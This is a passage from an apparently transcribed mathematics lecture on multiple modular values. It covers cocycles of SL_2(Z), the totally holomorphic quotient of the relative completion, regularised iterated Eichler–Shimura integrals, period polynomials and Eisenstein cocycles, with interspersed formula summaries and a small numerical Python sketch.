Maybe I'll write "congruent to 1" to emphasise that this identity holds in the quotient; the matrix S itself literally satisfies S^2 = -1. Likewise U^3 = -1, so U^3 is congruent to 1, where U is the element T·S, which is the matrix (1, -1; 1, 0). From this presentation we get an immediate corollary. The cocycle equation up here — let me call it dagger — by definition literally says that C is a non-abelian cocycle of SL_2(Z) in U_{1,1}^{dR}(C). That in turn is equivalent, because we have this explicit presentation, and because, by the remark above, to define a homomorphism on the group it suffices to define it on generators subject to the relations, to the following: you immediately get C_S|_{S bar} · C_S = 1, and — I might run out of room, let me squeeze it in here — C_U|_{U bar squared} · C_U|_{U bar} · C_U = 1, where C_U = C_T|_{S bar} · C_S. So we get these two equations coming from the presentation, and there we see very explicitly that the value of the cocycle on any group element is completely determined by its values on S and T: S and T are generators, so you just have to specify two elements C_S and C_T in U_{1,1}^{dR}(C), and you've got a cocycle if and only if these equations are satisfied. These are a complete set of equations, and they imply relations between multiple modular values. The important thing to remark — I said this before — is that we essentially know C_T completely: it only involves 2 pi i's, so you can think of C_T as known, and view this as a system of equations satisfied by C_S. All right, so now we want to actually compute something. We have some relations satisfied by these numbers — essentially it's as if we've written down formally what Z is, and we know some equations satisfied by its coefficients — and we now want to actually compute some integrals and get a grip on some of the coefficients explicitly. Sorry? Are these all the relations between the multiple modular values? So: the cocycles give relations, but they're not the only relations. There are some other relations that we know, of the form: a certain combination of MMVs is a multiple zeta value. The reason is geometric, and I haven't talked about it: roughly, these group schemes act on the fundamental group of the punctured Tate elliptic curve, which is a mixed Tate motive, and that mixes multiple zeta values into this picture in some complicated way and gives some other relations. But even throwing that into the mix, we still don't know all the relations, and there seems to be a lot more that we don't really know where they come from. This is already a very strong constraint, though — very powerful as it is — and I'll say more about that later on. Even more fundamentally, the difference here is that in the case of P^1 minus 3 points every period, every coefficient, can be written down as an iterated integral of some differential forms along this path dch from 0 to 1, and unfortunately in the case of SL_2(Z) you can't do that explicitly in all cases: you can only do it for a certain piece of the relative completion. So let me explain what that is and how that works.
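For reference, the cocycle conditions of this paragraph, written out in the conventions above:

\[
S=\begin{pmatrix}0&-1\\ 1&0\end{pmatrix},\quad T=\begin{pmatrix}1&1\\ 0&1\end{pmatrix},\quad U=TS=\begin{pmatrix}1&-1\\ 1&0\end{pmatrix},\qquad
S^{2}\equiv U^{3}\equiv 1\ \text{in }\mathrm{PSL}_2(\mathbb{Z}),
\]
\[
\mathcal{C}\in Z^{1}\big(\Gamma,\ \mathcal{U}_{1,1}^{dR}(\mathbb{C})\big)\ \Longleftrightarrow\
\mathcal{C}_S\big|_{\bar S}\,\mathcal{C}_S=1,\qquad
\mathcal{C}_U\big|_{\bar U^{2}}\,\mathcal{C}_U\big|_{\bar U}\,\mathcal{C}_U=1,\qquad
\mathcal{C}_U:=\mathcal{C}_T\big|_{\bar S}\,\mathcal{C}_S,
\]

together with C of minus the identity equal to 1.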
So: periods, and what I call the totally holomorphic — or sometimes just the holomorphic — quotient. The issue here is that there is no explicit description of the affine ring O(U_{1,1}^{dR}). Its elements would correspond to differential forms, or iterated integrals of differential forms, that we would then integrate along S, from 0 to infinity, and they would give numbers. The analogue in the case of P^1 minus 3 points — I just erased it — was very explicit: it was just a tensor algebra on two generators corresponding to dx/x and dx/(1-x). The reason there is no explicit description here — we can write down descriptions, but not explicit ones — is that there are essentially non-trivial Massey products in this business, as well as non-trivial cup products, and you have to choose a system of Massey products; you have to construct some kind of minimal model to get something explicit. So that's a bit of a pain. There's some recent progress by Marleau in his thesis on how to explain this in terms of certain complexes, but it's not going to be as nice as P^1 minus 3 points, where we can just write down a basis completely explicitly. And I don't know if there is some natural choice of a system of higher Massey products in this setting which would solve the issue; we don't know that yet. But what we can do for now is describe a piece of this, which I like to call the totally holomorphic quotient. So we have U_{1,1}^{dR}, and it has a quotient U_{1,1}^{dR,hol}. Informally, U_{1,1}^{dR}, or its Lie algebra, was generated by some Eisenstein classes and then two generators for every cusp form, e_f' and e_f''; and the quotient, informally, is generated by throwing away the e_f'' and keeping just the Eisenstein classes and the holomorphic part of the modular generators. Now I have to say some words: this is not motivic. U_{1,1}^{dR} does come from algebraic geometry and has a mixed Hodge structure, but this quotient does not: it is purely a de Rham thing, it only exists in the de Rham realisation. It is not motivic in whichever sense you wish to interpret "motivic" — in any reasonable sense: for example, it does not carry a mixed Hodge structure, and it does not have a Betti analogue. It's defined in terms of the Hodge filtration: in fact — I haven't spoken about the Hodge structure on this yet — you can define it as the quotient by the normaliser of F^0, where F is the Hodge filtration on U^{dR}. But it turns out that this thing can be written down explicitly, and its periods can be written down explicitly, so let's do that now. What this means — I forgot to write the line — is that O(U_{1,1}^{dR,hol}) is some subring inside O(U_{1,1}^{dR}), it has a completely explicit description, and it's going to give us differential forms that we can then integrate along S and T. — What is the path, for S? — You can't see it on the disc, because it leaves the disc, goes on a big detour, and comes back into the disc; the disc is just something local up here. So now let me describe this — we're going to get more and more concrete as the lecture progresses. Recall some notation: we had a vector space V_n^{dR}, the fibre of a certain algebraic vector bundle — the n-th symmetric power of the H^1 of the universal elliptic curve — at the tangent vector d/dq.
So it's just a vector space, and we have a set of generators that I'm going to denote by blackboard-bold X and Y, and it has a right action of Gamma. In fact we already saw the Betti version: the fibre of the canonical local system at the same tangential base point was — sorry, I messed this up — a direct sum of copies of Q; it's just the vector space of homogeneous polynomials in two variables of degree n, and this, we definitely saw, is that vector space with the right action of Gamma. The point of having these different notations is that SL_2^B and SL_2^{dR} are not quite the same: the comparison isomorphism has this factor of 2 pi i. So this is just to keep track of that: Y corresponds to 2 pi i times y, and X corresponds to x. As a first approximation you can just ignore the distinction between the X's and Y's and take the standard Betti x and y of the modular forms literature, but if you actually want to work here you have to be very careful with these different normalisations, depending on where you're working. This is due to the comparison morphism between SL_2^B and SL_2^{dR}; it's completely equivalent to it. I don't want to dwell too long on this — it's really trivial — but it's important to do things carefully, otherwise things become incredibly confusing and none of the Hodge theory works out if the weights are all wrong. So now let curly B_n be a Q-basis for the space of cusp forms of weight n with rational Fourier coefficients — I called this S_n in an earlier lecture. Then we can write this thing down explicitly; it's just a tensor algebra. The affine ring O(U_{1,1}^{dR,hol}) is nothing other than the tensor coalgebra generated on the Q-vector space spanned by certain symbols. The definition is simply the tensor coalgebra on a space of modular forms, but it's nice to write down a basis to do computations. Having chosen a basis, this can be made very concrete: we have symbols E_{2n+2} X^i Y^j, where i + j = 2n, for all n beginning with 1 — these correspond to the Eisenstein series E_4, E_6, etc. — and then symbols for the cusp forms. Before, we had two generators e_f' and e_f'', one corresponding to holomorphic modular forms, the other to weakly holomorphic modular forms; here we throw out the weakly holomorphic part, so we just have a single generator for every cusp form: e_f' X^i Y^j with i + j = 2n and f a basis element of B_{2n+2}. These are the cuspidal generators. Now, the tensor coalgebra is, as a vector space, just the tensor algebra: for a vector space V, T(V) is the direct sum of the V^{tensor n}. "Coalgebra" means there is a coproduct on it. Precisely, this is a Q-vector space with basis given by words in these symbols — non-commuting letters — and the coproduct is given by deconcatenation: a word w_1 ... w_n is sent to the sum over i from 0 to n of (w_1 ... w_i) tensor (w_{i+1} ... w_n). Here the notation gets a little confusing, so what I like to do — if you had a word, for example E_4 X^2 followed by E_6 Y^3 — since these X's and Y's are the same letters, it's convenient to put a little subscript: the leftmost letter gets subscript 1, and the i-th letter gets subscript i. It's just a bookkeeping notation.
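Before going on, here is the description of this paragraph in formulas (B_{2n+2} denotes the chosen basis of cusp forms of weight 2n+2):

\[
\mathcal{O}\big(\mathcal{U}_{1,1}^{dR,\mathrm{hol}}\big)\ \cong\ T^{c}(V),\qquad
V=\bigoplus_{n\ge 1}\ \bigoplus_{i+j=2n}\Big(\mathbb{Q}\,\mathbf{E}_{2n+2}X^{i}Y^{j}\ \oplus\bigoplus_{f\in B_{2n+2}}\mathbb{Q}\,\mathbf{e}'_{f}X^{i}Y^{j}\Big),
\]
\[
\Delta(w_1\cdots w_n)=\sum_{i=0}^{n}(w_1\cdots w_i)\otimes(w_{i+1}\cdots w_n)\qquad\text{(deconcatenation).}
\]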
You don't have to use those little subscripts, but I like to do it in my papers and I might do it later on; if you see subscripts on X and Y, it's just keeping track of which X belongs to which letter. Okay, so we had this cocycle from Gamma to the full unipotent radical of the de Rham relative completion, and it depended on a choice of splitting. Now we can look at something smaller: its image in the holomorphic quotient. So we had this huge cocycle, the full cocycle C, and now we have a smaller cocycle where we've thrown out a lot of the periods — all the iterated integrals which aren't totally holomorphic — but already this is going to be very interesting. What we get from this, automatically, since this is a group homomorphism, is a holomorphic cocycle C^hol — sorry, my writing is bad: "hol", standing for totally holomorphic — a cocycle with values in this quotient. And now here's a key point that I can't fully explain yet without doing some Hodge theory. The original cocycle depended on a choice of splitting of an exact sequence at the very beginning; if you choose that splitting to be compatible with the Hodge theory — and you can do that — then it turns out that this part, the part on U^{dR,hol}, actually splits canonically. So this cocycle C^hol is canonical: it does not depend on any choices, and there is a very good Hodge-theoretic reason for that. Provided your initial choice of splitting respected the Hodge and weight filtrations, the relevant piece sits in the Hodge filtration, things separate out, and the SL_2 can be split off very easily. Okay, so this thing is canonical, so we can hope to write it down, and its coefficients are regularised iterated integrals — also known as iterated Eichler–Shimura integrals. So what I meant to say is that the coefficients are regularised iterated Eichler–Shimura integrals. These were defined by Manin a few years ago, without the word "regularised", so in the convergent case. This is something you can write down very explicitly, and that's what we're going to do. We could take a break here or just press on and finish early, depending on what you prefer. Okay, so we'll take a very brief five-minute break and then we'll write down some iterated integrals. Okay, so I'll explain now how to calculate these totally holomorphic periods. First some notation: given a modular form f of weight 2n+2, let me write f-underline of tau for (2 pi i) f(tau) (X - tau Y)^{2n} d tau. I've been a bit inconsistent over this: sometimes it's convenient to normalise by (2 pi i)^{2n+1}; here it's convenient to normalise just with a 2 pi i. It doesn't make much difference, but sometimes I've used this notation to mean something very slightly different. A first remark, which won't play a role: if we write this in terms of the parameter q and rewrite the Betti generators as de Rham generators, then this is f(q) (X - log q · Y)^{2n} d log q; the Y eats up all the 2 pi i's, and you see that this is actually rational. So f-underline of tau is thought of as a section of V_{2n} tensor Omega^1 on the upper half plane.
And so every holomorphic modular form gives a section of this trivial bundle over the upper half plane. We define a formal one-form Omega^hol as follows. We sum over n: for the cusp forms of each weight we take a basis and attach a symbol to every cusp form — the symbol keeps track of that particular one-form — and that's the cuspidal part; then for the Eisenstein series we take E_{2n+2}-underline of tau (n beginning with 1) times the symbol E_{2n+2}, where E_{2n+2} is the Eisenstein series normalised to have rational q-coefficients with the coefficient of q equal to 1. Okay, so keep that there. Now we can take iterated integrals of this, and this was first done by Manin in two very short but very nice papers a few years ago. For any two points tau_1, tau_2 in the upper half plane, define — so this was done by Manin — I^hol, the integral, or the transport if you like, from tau_1 to tau_2: it is the formal power series 1 plus the integral from tau_1 to tau_2 of Omega^hol, plus the double iterated integral of Omega^hol Omega^hol, plus dot dot dot. This is a formal power series in the symbols e_f' X^i Y^j and E_{2n+2} X^i Y^j. I'm mixing metaphors here: I'm taking the de Rham generators but the Betti X and Y, which is not a very hygienic thing to do, but it simplifies the formulae considerably — and it's actually what's done in the modular forms literature. It's confusing at first to have a de Rham generator together with the Betti guys; it's just important that that's said once. — Is this a formal differential form? — Yes, it's formal: Chen calls this a formal power series connection, and this is its transport. So this is a non-commutative formal power series. I don't know if this is literally a special case of Chen's work on iterated integrals or a very slight variant, because you've got differential forms with values in a trivial vector bundle; it's a tiny modification of Chen's general theory. So, if you're not familiar with this, let me briefly remind you what an iterated integral is. The theory was developed extensively by Chen over many years; in the physics literature it was also considered and bears Dyson's name, though the vast majority of the foundational work on this was done by Chen. — You have the dates? It's 1970? — I thought it was earlier than that, but okay, I take your word for it. The basic construction — I'll be very brief, because this is very well known: take some smooth differential one-forms on a smooth manifold M — they could be vector-valued in a trivial vector bundle, as in our case; it makes hardly any difference — and give ourselves a smooth path gamma, let me take an open path. Then the iterated integral of this sequence of one-forms along gamma is defined to be what physicists call the time-ordered integral: the integral over the simplex 0 <= t_1 <= ... <= t_n <= 1 of f_1(t_1) ... f_n(t_n) dt_1 ... dt_n, where f_i(t) dt is defined to be gamma-star of omega_i, the pull-back, for i = 1 to n.
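Before unpacking Chen's definition, the formal one-form and its transport from this paragraph can be put in one display (normalisations as above):

\[
\Omega^{\mathrm{hol}}(\tau)\;=\;\sum_{n\ge 1}\Big(\mathbf{E}_{2n+2}\,\underline{E}_{2n+2}(\tau)\;+\sum_{f\in B_{2n+2}}\mathbf{e}'_{f}\,\underline{f}(\tau)\Big),
\qquad
\underline{f}(\tau)=(2\pi i)\,f(\tau)\,(X-\tau Y)^{2n}\,d\tau,
\]
\[
I^{\mathrm{hol}}(\tau_1,\tau_2)\;=\;1+\int_{\tau_1}^{\tau_2}\Omega^{\mathrm{hol}}
+\int_{\tau_1}^{\tau_2}\Omega^{\mathrm{hol}}\Omega^{\mathrm{hol}}+\cdots
\]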
So what's going on in Chen's definition is this: when you've got a smooth map from the interval to M and a one-form on M, you can pull it back to the interval [0,1], on which we have the coordinate t, and any one-form on the interval can be written as some function times dt. So this is just omega_1 written parametrically. The idea is that you take a primitive of it — an indefinite integral from 0 to t — then you multiply that function by the next form omega_2, which gives you a one-form; you take a primitive of that to get another function, multiply by the next differential form, integrate, multiply, integrate, multiply, integrate. That's the notion of an iterated integral. — This is the time-ordered integral? — Exactly, time-ordered. The way I like to think of it: in a path integral you imagine a point travelling along a path; here you're firing n points along the path one after the other, sampling the path at n points in sequential order. Okay, so there's a huge theory here which I'm not going to go into. [Inaudible remark from the audience.] Exactly, yes. Absolutely. So let me skip that theory, because it could be an entire course, and just write down the properties of this particular formal power series of iterated integrals. I should say briefly that iterated integrals satisfy lots of properties: the product of two iterated integrals along the same path can be written as a linear combination of iterated integrals along that path via the so-called shuffle product formula, and there are formulae for what happens when you compose paths, when you reverse paths, and so on. In our case these give the following. First, because this form Omega is closed, the integral does not depend on the choice of path: since the upper half plane is simply connected, it is independent of the choice of smooth path between tau_1 and tau_2, so it's really a function of the endpoints tau_1 and tau_2. That's because this differential form is integrable — it's closed and its wedge product with itself vanishes, which is clear because we're on a complex one-dimensional space. Okay, so having said that, this is a function of two variables, and composition of paths says that I^hol from tau_0 to tau_2 is simply the product of the non-commutative formal power series I^hol(tau_0, tau_1) and I^hol(tau_1, tau_2), in the appropriate order. Next, it satisfies a differential equation: the total differential of I^hol(tau_0, tau_1) is I^hol(tau_0, tau_1) Omega^hol(tau_1) minus Omega^hol(tau_0) I^hol(tau_0, tau_1), where Omega^hol appearing on the right or on the left means that the symbols e_f' and E_{2n+2} act by right or left multiplication, respectively, on formal power series. There are shuffle product identities, which mean that if you take any two coefficients of this power series and multiply them together, the product can be written as a linear combination of other coefficients — in other words, the vector space generated by the coefficients forms an algebra. And finally, something which is in some sense new in this situation, because it's not a general feature of Chen's theory: what we gain is the action of SL_2(Z), and these integrals are equivariant. That is the only feature which is a novelty.
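As an illustration of the "integrate, multiply, integrate" recursion just described, here is a minimal numerical sketch in Python (not from the lecture; scalar one-forms f_i(t) dt already pulled back to [0,1], simple trapezoidal quadrature):

import numpy as np

def iterated_integral(fs, n_steps=10_000):
    # fs: list of callables f_i(t); returns the integral of
    # f_1(t_1) ... f_n(t_n) over the simplex 0 <= t_1 <= ... <= t_n <= 1.
    t = np.linspace(0.0, 1.0, n_steps)
    acc = np.ones_like(t)           # running primitive, starts as the constant 1
    for f in fs:
        integrand = acc * f(t)      # multiply by the next pulled-back one-form
        steps = (integrand[1:] + integrand[:-1]) / 2 * np.diff(t)
        acc = np.concatenate(([0.0], np.cumsum(steps)))   # primitive from 0 to t
    return acc[-1]

# sanity check: the volume of the 2-simplex is 1/2
print(iterated_integral([lambda t: np.ones_like(t)] * 2))   # ~0.5

The same recursion, applied to the vector-valued forms above together with the regularisation described next, is one way the coefficients of I^hol could be computed in practice.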
The reason for this equivariance is that the differential form we're integrating is itself SL_2-equivariant; that's going to be very important. Okay, so these are integrals between two points on the upper half plane. Now I want to take one of the points to be the cusp, and things are going to diverge, so we need to regularise with respect to the tangent vector at the cusp, which is playing the role of our base point. Let me explain very concretely how to do that — it's very straightforward. The cusp forms pose no problem at all, because they go to zero very fast in the neighbourhood of the cusp; the problem is the Eisenstein series, which have a non-vanishing zeroth Fourier coefficient, and that gives divergence as you go to infinity. The thing to do is to isolate this divergence and take what is essentially the residue of the one-form in the q-disc. As I just said, all the cusp forms drop out; all we keep is the zeroth Fourier coefficients of the Eisenstein series. So this is some kind of residue of Omega^hol at q = 0. The notation: for any modular form f, f^0-underline of tau is defined to be (2 pi i) a_0(f) (X - tau Y)^{2n} d tau, where the a_n(f) are the Fourier coefficients of f; for a cusp form it vanishes altogether. Now, for any points tau_0, tau_1 in C — and here the meaning of C is that it's really the tangent space at the origin of the disc, the tangent space to the compactified M_{1,1} at the cusp — we can take iterated integrals of these forms, and let's call that I^hol_infinity(tau_0, tau_1): the same construction, iterated integrals, but now of this differential form. This is very explicit: we know that the residues, the constant terms of the Eisenstein series, are just Bernoulli numbers, so Omega^hol_infinity is a really explicit formal power series whose coefficients are Bernoulli numbers. So we can put the two pieces together and define the regularised iterated integrals. Define I^hol of tau — you can write it as I^hol(tau, infinity) if you prefer, but I just write it as I^hol(tau) — to be the limit, as epsilon goes to the cusp, of I^hol(tau, epsilon) times I^hol_infinity(epsilon, 0). There's a very nice geometric reason why this formula should be what it is; I've given lectures about this before and don't have time here, so let's just take it as a definition — and you can believe me that it converges very nicely as epsilon goes to infinity. Essentially the second factor cancels out all the divergences in the iterated integral, and it converges extremely fast. Another convenient notation is to write this as the iterated integral of Omega^hol from tau to the tangent vector at the cusp: we think of it as the formal power series where the upper limit of integration, which was tau_2 before, has been taken to be the tangent vector at the cusp. That is the definition — that's what the notation means — and from it you can extract very concrete, explicit formulae for computing these iterated integrals. So these are regularised with respect to the unit tangent vector at the cusp.
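In symbols, the regularisation just described reads as follows (writing the tangent vector at the cusp in the upper limit of the last integral, a shorthand of mine):

\[
\underline{f}^{\,0}(\tau)=(2\pi i)\,a_0(f)\,(X-\tau Y)^{2n}\,d\tau,\qquad
\Omega^{\mathrm{hol}}_{\infty}=\ \text{the same sum as }\Omega^{\mathrm{hol}}\ \text{with each }\underline{f}\ \text{replaced by }\underline{f}^{\,0},
\]
\[
I^{\mathrm{hol}}(\tau)\ :=\ \lim_{\varepsilon\to\ \mathrm{cusp}}\ I^{\mathrm{hol}}(\tau,\varepsilon)\cdot I^{\mathrm{hol}}_{\infty}(\varepsilon,0)
\ =\ \int_{\tau}^{\,\partial/\partial q}\Omega^{\mathrm{hol}}.
\]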
This regularised I^hol(tau) now turns out to be the unique solution to essentially the same differential equation, but now as a function of one variable: d of I^hol(tau) equals minus Omega^hol(tau) times I^hol(tau), and the constant of integration — the initial condition — is fixed by the fact that its value at the tangent vector at the cusp is 1. That uniquely determines this power series of iterated integrals. What the second condition means — another way to think of it — is that there is a regularised limit as tau goes to the cusp at unit speed along this tangent vector, and that regularised limit is just 1. Okay, moving on. This is very explicit, and the convergence is exponentially fast, so it is very convenient to compute with: from just the first few Fourier coefficients of a modular form you can get these numbers, for any value of tau, to hundreds of digits very quickly. So then, how does the group SL_2(Z) act? Well, for all gamma, an immediate consequence of uniqueness for this differential equation is an equation involving C^hol_gamma; you could take it as the definition of C^hol_gamma if you're analytically minded — I define it a different way, but this is completely equivalent. Here C^hol_gamma is a formal power series in these symbols — that comes from how I wrote down the definition of O(U^{dR,hol}) — and you can also think of it as a complex point of this group scheme. You can check this equation immediately: if you apply it with gamma = gh, with gamma = g and with gamma = h, you immediately deduce the cocycle equations for C^hol — a very simple exercise; the cocycle equations follow from this formula. — Is that the definition of C_gamma? — Sorry? — Is the first line the definition of C_gamma? — I define it in a top-down way, and this is then a formula for C^hol_gamma; but you could take it as a definition if you like — it's a perfectly good definition. And so this lies in Z^1(Gamma, U). Okay, so these iterated integrals satisfy shuffle product relations and these cocycle relations; in particular they are determined by the values on T and S. From this formalism you can show that the value on T only sees what's happening in a neighbourhood of the cusp, and it therefore only depends on the infinite part of I^hol — the power series obtained by integrating the residue part of Omega^hol. So it only sees the Eisenstein series, and it is essentially a completely elementary integral involving Bernoulli numbers: in length one you get Bernoulli numbers, in length two products of two Bernoulli numbers, then products of three, and so on. It's completely elementary and you can compute it explicitly to all orders: it only involves the residues of the Eisenstein series, and therefore only Bernoulli numbers and, of course, powers of 2 pi i. So we can write this down explicitly. The meat is S, and again this is mysterious, but by messing around with this formula you can write it down like this: you can look at iterated integrals from i — the point i in the upper half plane, which satisfies S(i) = i, a fixed point of the involution S — to the cusp, and you get superfast convergence.
Okay, so having written down these holomorphic iterated integrals, I now want to give some examples. The simplest examples are in length one — in other words, a single iterated integral — and in that case we recover the classical theory of periods of modular forms. So I'll dispense with that and then say something about length two. Examples. The first example is a single iterated integral of a cusp form: just a piece of this, the first non-trivial term in the expression. Take an element f of our basis of cusp forms with rational Fourier coefficients — it doesn't have to be in our basis, but it's convenient — of weight 2n+2. We have this formal power series C^hol_gamma, a power series in all these non-commuting variables, and we take the coefficient corresponding to e_f'. The coefficient of e_f' in this power series is C^hol_gamma(e_f') — that's the definition: take the coefficient of this single letter in the power series. And that defines a cocycle with values in V_{2n}, and it's an abelian cocycle. The reason is that if you take my non-abelian cocycle equation, which I've erased, but it's C^hol_{gh} = C^hol_g|_h · C^hol_h, and think about what it means to take the coefficient of a letter — a word of length one — then what that gives you is exactly the equation C^hol_{gh}(e_f') = C^hol_g(e_f')|_h + C^hol_h(e_f'). So taking just the linear part, the terms of length one, essentially abelianises it, and you get the classical abelian cocycle equation. This is very standard in the theory of modular forms. From the general formula we get the values of C^hol on S and T. The value on T is zero — not very interesting; I should maybe say C^hol_T(e_f') = 0, which follows from the expression over there, so it's a cuspidal cocycle. The value on S is essentially the integral from S^{-1} of the tangent vector at infinity to the tangent vector at infinity of f-underline(tau) — but in fact, because this modular form vanishes at the cusp, we don't need a tangential base point at all: we can just take a classical integral from 0 to infinity, and that is perfectly convergent. Up to some normalisation by 2 pi, this is exactly the Eichler integral, or Eichler–Shimura integral. This is a big subject and it has been studied in great detail. If you expand it as a polynomial in X and Y, you get integrals of f(tau) times a power of tau, which is nothing other than a Mellin transform of f, and the Mellin transform of a modular form is its L-function. To cut a long story short, you can write it in the form: a sum over k from 1 to 2n+1 of some coefficient — elementary, and I can't be bothered to write it down — times the value L(f, k) of the L-function of f, times X^{k-1} Y^{2n+1-k}. Let's call this P_f; it is also called the period polynomial of the cusp form f, up to some even power of 2 pi, some normalisation. The L-function here was defined by Hecke: L(f, s) is the sum over n of the Fourier coefficients a_n of f divided by n^s, and this converges for all s with sufficiently large real part — you can be precise about this.
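The "elementary coefficients" can be made explicit by expanding (X - tau Y)^{2n} and substituting tau = iy. The computation below is mine — the lecture leaves the constants implicit — and up to the relabelling k <-> 2n+2-k (or the functional equation) it matches the indexing used a moment ago:

\[
\int_{0}^{i\infty} f(\tau)\,(X-\tau Y)^{2n}\,d\tau
=\sum_{k=1}^{2n+1}\binom{2n}{k-1}(-1)^{k-1}\,i^{\,k}\;\Lambda(f,k)\;X^{2n+1-k}Y^{k-1},
\qquad
\Lambda(f,s)=\int_{0}^{\infty} f(iy)\,y^{s-1}\,dy=\frac{\Gamma(s)}{(2\pi)^{s}}\,L(f,s).
\]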
There is something funny about the definition of this L-function, which always seems strange: the definition also works for Eisenstein series, but you never include the zeroth Fourier coefficient — the sum starts at n = 1, not n = 0. That has always struck me as slightly strange, because the functional equation for this L-function comes from the modular behaviour of f with respect to the inversion S, and if you remove the constant coefficient you break that invariance completely. So it's odd that the L-function defined in this manner, with the sum starting at 1 and not 0, still satisfies the functional equation. But actually, if you think about it, that truncation at zero is exactly this tangential base point. If you work out this formula — and I regret that I don't have time to do it — in length one, you take the holomorphic integral and you subtract something, and that has exactly the effect of explaining this trick of Hecke's for getting the L-function in all cases. That's a very nice little lemma — a nice remark — and I regret that I don't have time to explain it. It's interesting only for the Eisenstein series, but it becomes absolutely crucial for higher-length iterated integrals: you really have to regularise in a careful way, and the formula is more complicated. When you do this Hecke business, it's always strange: you've got essentially the Mellin transform from 0 to infinity, and you've always got this weird extra term integrating the residue from 0 to 1 — essentially you integrate f minus its constant Fourier coefficient from 0 to infinity, and then there's an extra term, which is an integral of the constant term from 0 to 1. The meaning of that extra term, the integral from 0 to 1, is an integral along the tangent vector of length one in the tangent space, and that's very satisfying because it gives a clear geometric meaning to these classical formulae. Anyway, I digress; this is very well understood. Let me just spell out the cocycle equations, in case you haven't seen them before. The cocycle equations for S and T amount to functional equations on P_f which are called the period polynomial relations: the first equation corresponds to this one here, and the second corresponds to a three-term equation. An example, if I have time, quickly: if we take f to be the Ramanujan cusp form of weight 12, then we can write this polynomial explicitly. It has an even part and an odd part: the even part involves a holomorphic period omega^+, which is real, and a coefficient 36 over 691 — I hope these coefficients are correct and I didn't copy them down incorrectly — and the odd part is given by the other holomorphic period. These polynomials are very famous and show up in all sorts of places: they are the smallest non-trivial solutions to these sets of equations. Okay, then a remark: here we are only looking at the holomorphic iterated integrals, which means we are only integrating f. If we want to capture the quasi-periods, as I mentioned in the last lecture — and again this is something that has not at all been considered classically — then we need to consider the full cocycle C_S, not just its totally holomorphic part C^hol_S.
Here these iterated integrals are given by holomorphic modular forms. We're studying this at the moment. I claim that in the length-one case you can do the same calculations, and that will involve integrating a weakly holomorphic modular form with poles at the cusps — you have to be careful how to do that — but then you can capture the quasi-periods of the motive of f. So there are some numbers that I call eta^+ and eta^-. — Is this cocycle known? — This is Eichler–Shimura, yes; this is very classical and it has been studied in great detail by Zagier and Manin, starting in the sixties I think, and there is a huge literature on it by now. I should mention that Manin did a lot more — I regret I don't have time to talk about it. Manin proved something very beautiful, a sort of universal coefficients theorem: he showed that there is an action of the Hecke operators on these polynomials. And once you have an action of the Hecke operators, you get the eigenvalues and you can regenerate your modular form; so the period polynomial determines the modular form uniquely. I regret I don't have time to say more, but he explained how to get the Hecke operators to act on these polynomials. It's a very beautiful theory, and we don't really know how to generalise it in any reasonable way to higher lengths. These give some extra relations over and above the cocycle relations satisfied by the period polynomials. Okay, so the second example is the case of an Eisenstein series, and this is less classical — I mean, it is equivalent to things that have been known for a long time, and in particular I'm sure that Ramanujan knew the formula I'm going to write down. What's new is the notion of tangential base point: previously these formulae were somewhat ad hoc, but now, equipped with the notion of tangential base point, we can define a completely canonical Eisenstein cocycle, by integrating all the way to the tangent vector at the cusp. In the past you had to truncate somewhere, or regularise with some choice; this is completely canonical, and the formulae are equivalent to formulae in the literature. So what we get is that the coefficient of E_{2n+2} is an abelian cocycle which is canonical. Let me write it down. First we define a rational cocycle — there's a lot of confusion about this in the literature, so I think it's good to spend a little time on it — a rational cocycle that I call E^0. There is a slick way to write it down as a generating series, but I think it's more instructive to give the formula. The value on T is a Bernoulli number B_{2n} over (2n) factorial — this looks a bit strange, but there's a reason for it — times ((X+Y)^{2n-1} - X^{2n-1})/Y; this is a polynomial, the Y factors out, and it is obtained as an easy integral around the cusp — I gave the formula earlier; it's an exercise to do it. For the value on S, the quick way to get it is through the L-function of the Eisenstein series, which is a product of Riemann zeta functions; taking the values of a product of Riemann zeta functions, you find this expression with products of Bernoulli numbers — again, I hope I didn't miscopy the formula, but it's in my paper somewhere. This expression with products of Bernoulli numbers comes up an awful lot in this theory and in the theory of multiple zeta values.
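For the record: with the normalisation just mentioned (coefficient of q equal to 1, so a_m = sigma_{2n+1}(m) for m >= 1), the L-function of the Eisenstein series factorises, and zeta at even integers is a Bernoulli number — which is where the products of Bernoulli numbers come from. This is standard, though the lecture does not display it:

\[
L(E_{2n+2},s)=\sum_{m\ge 1}\frac{\sigma_{2n+1}(m)}{m^{s}}=\zeta(s)\,\zeta(s-2n-1),
\qquad
\zeta(2j)=\frac{(-1)^{j+1}B_{2j}\,(2\pi)^{2j}}{2\,(2j)!}.
\]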
It's very interesting. So then the holomorphic Eisenstein cocycle of an Eisenstein series is 2 pi i times this rational cocycle, plus a coboundary term: (2n)!/2 times a Riemann zeta value times a coboundary. I gave the formula for the coboundary earlier, in the first lecture I think, but I'll give it again: the coboundary of a vector v is delta^0(v)(gamma) = v - v|_gamma. When this is evaluated on the element T, the coboundary doesn't appear at all — you just get the value of E^0 on T. Evaluated on S, you get the value of E^0 on S plus some zeta value times (Y^{2n} - X^{2n}). And it's very interesting, because it means that as a cohomology class the zeta part drops out completely — the transcendental part disappears — and the cohomology class associated with an Eisenstein series is rational, in accordance with the Manin–Drinfeld theorem. But as a cocycle it is not rational: it has a genuinely transcendental coefficient, and that's going to be extremely important later on. Okay, so that's everything in length one, and it's completely classical. That was the length-one story; we've described it pretty much completely, it corresponds to the abelianisation of the relative completion, and it's classical. Things start to get interesting in length two, and here we don't know so much; I'll just say briefly some things I do know. The first interesting case is to look at two Eisenstein series. The advantage of Eisenstein series is that they are totally holomorphic by nature — there is no weakly holomorphic counterpart — so we see everything; we can compute everything with these regularised iterated Eichler integrals. So we want the coefficient of a word in two Eisenstein series in this power series, and this defines a Gamma-cochain with values in V_{2m} tensor V_{2n}. You can in turn break this up into SL_2-representations — it has many pieces, so it's quite a rich object. The most compact way to write the cocycle equations on this thing — the relations between its coefficients — can, I claim, be encoded as follows: this is a Gamma-cochain in C^1(Gamma, V_{2m} tensor V_{2n}), and the slickest way of writing down the equations is in terms of a 2-cocycle: the coboundary of C^hol(E_{2m+2} E_{2n+2}) is the cup product of the cocycles C^hol(E_{2m+2}) and C^hol(E_{2n+2}) — the "hol" is redundant here. So this is a cup product. The nice thing about this formula is that it's a sort of recursive expression giving you all of these coefficients in terms of the cocycles of Eisenstein series, which we have written down completely explicitly. And we see straight away that we're going to get some odd zeta values — two odd zeta values, and the product of two odd zeta values, for starters. This determines the cochain up to an actual cocycle, which satisfies the classical cocycle equations. And those coefficients are going to appear: for example, in weight 